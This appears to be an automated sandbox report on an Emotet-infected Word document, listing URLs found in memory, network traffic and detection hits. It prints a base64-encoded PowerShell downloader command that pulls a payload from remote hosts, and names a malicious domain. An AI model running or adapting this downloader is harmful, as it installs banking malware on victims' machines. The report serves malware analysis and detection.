Source: WINWORD.EXE, 00000000.00000003.1770534835.000000000C798000.00000004.00000001.sdmpString found in binary or memory: https://nexusrules.officeapps.live.com/stance.UseCurrentCritiqueDirectLookupn
Source: powershell.exe, 00000005.00000002.1958436507.000001BA17DD6000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: WINWORD.EXE, 00000000.00000002.2872867058.000000000C726000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msed
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abClient4s
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/ab
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com$S
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com$e
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com0-000000
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com0000-C00
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com0209FF-0
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com2_t
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com46
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com8
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comBe
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comFF-0000-rd
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comHe
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comISTRY
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comL
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comLSID
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comPe
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comY
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comableIn
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comangeGa
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comates
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comcipat
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comeferInnj
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comftware
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comimerS
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coml
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comleRoun
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.commentatVj
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comnsert
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comportD
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comre
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comtAs
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comtion.M
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comtion.S
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comve
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comzd
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com~k
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/dtsS&
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseP-R
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?iom:
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000002.2864486869.00000000004C0000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/redir?page=view&resid=1229293068B60FF7
Source: WINWORD.EXE, 00000000.00000003.1770296641.000000000C6F2000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comked.
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.commd.
Source: powershell.exe, 00000005.00000002.1956108228.000001BA08ED2000.00000004.00000001.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000005.00000002.1956108228.000001BA08ED2000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: powershell.exe, 00000005.00000002.1951460305.000001BA080C0000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: https://orchaskiddiesworld.com/t24dfh/ea/
Source: powershell.exe, 00000005.00000002.1950821548.000001BA07E50000.00000004.00000001.sdmpString found in binary or memory: https://orchaskiddiesworld.com/t24dfh/ea/8
Source: powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: https://orchaskiddiesworld.com/t24dfh/ea/p#u
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comk
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities%
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsongCo
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/dEfzj
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/8
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionst
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonry39m
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2198755822.0000000000BA2000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl8
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13n
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://powerlift.acompli.net
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios04=
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetectr
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://schema.org
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.com
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comk
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://shell.suite.office.com:1443
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.2868017953.0000000002E9A000.00000004.00000001.sdmpString found in binary or memory: https://skyapi.live.net/Activity/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workEventFl
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerLiftFrontDeskBaseUrlhttps://pow
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.2195973666.000000000C867000.00000004.00000001.sdmpString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://store.office.cn/addinstemplate
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://store.office.com/?productgroup=OutlookWrLzL
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://store.office.com/addinstemplate
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://store.office.de/addinstemplate
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://store.officeppe.com/addinstemplateasso;l
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
Source: WINWORD.EXEString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrites
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comk
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile97W
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.com
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.com42Z
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://templatelogging.office.com/client/log
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://templatelogging.office.com/client/logOltx$
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html7
Source: WINWORD.EXE, 00000000.00000003.1769189935.000000000C8D3000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlInsightsImmersivehttps
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1768834808.000000000C7B2000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://web.microsoftstream.com/video/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ExchangeAutoDiscoverhttps:/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosnts
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://wus2-000.contentsync.
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.2867813501.0000000002DD5000.00000004.00000001.sdmpString found in binary or memory: https://wus2-000.pagecontentsync.
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2tion
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-T6DDMSN
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.ms
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.ms7Z
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpBinary or memory string: DirectDrawCreateEx

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Users\user\20.exeCode function: 8_2_00FAB1628_2_00FAB162
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001EB16210_2_001EB162
Emotet Banking Trojan downloader foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enco JABWAGIAbABtAG0AYgB4AGUAZAB1AGoAPQAnAFkAeQBvAHcAcABpAHMAYQBrAHgAcwBqAHgAJwA7ACQAUwBjAHcAaABvAGcAawBoAHoAZwBwACAAPQAgACcAMgAwACcAOwAkAEsAZwBrAHEAZwBuAGwAYwB5AHEAcgBmAD0AJwBJAG4AaQByAGkAbQBzAGQAcgBoAHAAJwA7ACQAWQB4AGoAbgBuAGsAYwB0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAGMAdwBoAG8AZwBrAGgAegBnAHAAKwAnAC4AZQB4AGUAJwA7ACQARQB0AGQAbwBiAHgAbQB0AG8AeQA9ACcASwBtAG0AeAB5AHEAbgBwAHcAbwBlACcAOwAkAEoAZwB6AHIAZABoAHoAYgB6AGQAeQBpAGkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAGIAQwBsAGkARQBuAHQAOwAkAEgAagB3AHQAaABsAGIAZwBzAGIAdgA9ACcAaAB0AHQAcABzADoALwAvAGEAeABvAGMAbwBtAC4AZgByAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBhAGkAbgB0AC8AZAAwADEALwAqAGgAdAB0AHAAOgAvAC8AYgBsAG8AZwAuAGkAbgBuAG8AdgBhAGMAYwBlAHIALgBjAG8AbQAvAHAAaABxAGcALwBhAE0ALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBlAHgAaQBtAGEAbABlAHIAdAAuAGMAbwBtAC8AZABoAHgAcQAvAFgAdwBlAHUAWgBEAC8AKgBoAHQAdABwAHMAOgAvAC8AaQB0AGIAegAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AG
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000008.00000002.1964883162.0000000000FA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.1960840461.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.1942402576.0000000000DF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.2886137391.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.1942360455.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.2886079158.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.1961622086.0000000000711000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.1964755289.00000000007E0000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\20.exeCode function: 8_2_00FA1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,8_2_00FA1F75
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E1F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,10_2_001E1F75

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000008.00000002.1964883162.0000000000FA1000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Emotet in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1960840461.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Emotet in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1942402576.0000000000DF1000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Emotet in memory Author: JPCERT/CC Incident Response Group
